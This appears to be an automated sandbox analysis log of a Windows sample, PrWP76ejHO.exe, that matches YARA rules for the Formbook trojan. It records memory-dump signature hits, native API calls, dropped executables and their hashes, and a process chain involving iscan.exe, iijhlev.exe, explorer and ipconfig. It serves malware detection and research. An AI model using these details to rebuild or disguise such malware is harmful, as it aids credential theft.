          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: PrWP76ejHO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0041687D
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040B4A4
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040C1ED
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040B9A0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040BDB8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040C622
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0045090D
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00450CF2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004228B2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421B51
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00421449
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040B522
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040B527
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040FF77
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF20A8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3B090
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF28EC
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AFE824
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A830
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1002
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2F900
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF22AE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFA2B
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5EBB0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE03DA
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEDBD2
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5ABD8
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2B28
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ACCB4F
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AB40
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3841F
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AED466
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3D5E0
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF25DD
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A20D20
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2D07
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1D55
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF2EF7
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A46E30
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AED616
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF1FF1
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AFDFCE
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: String function: 00A2B150 appears 139 times
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E047 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E0C7 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E177 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041DF97 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E041 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E0C1 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0041E171 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004012A4 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A69770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6A770 NtOpenThread,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\iscan.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
          Source: PrWP76ejHO.exeReversingLabs: Detection: 73%
          Source: PrWP76ejHO.exeVirustotal: Detection: 32%
          Source: C:\Users\user\Desktop\PrWP76ejHO.exe File read: C:\Users\user\Desktop\PrWP76ejHO.exe
          Source: PrWP76ejHO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PrWP76ejHO.exe C:\Users\user\Desktop\PrWP76ejHO.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
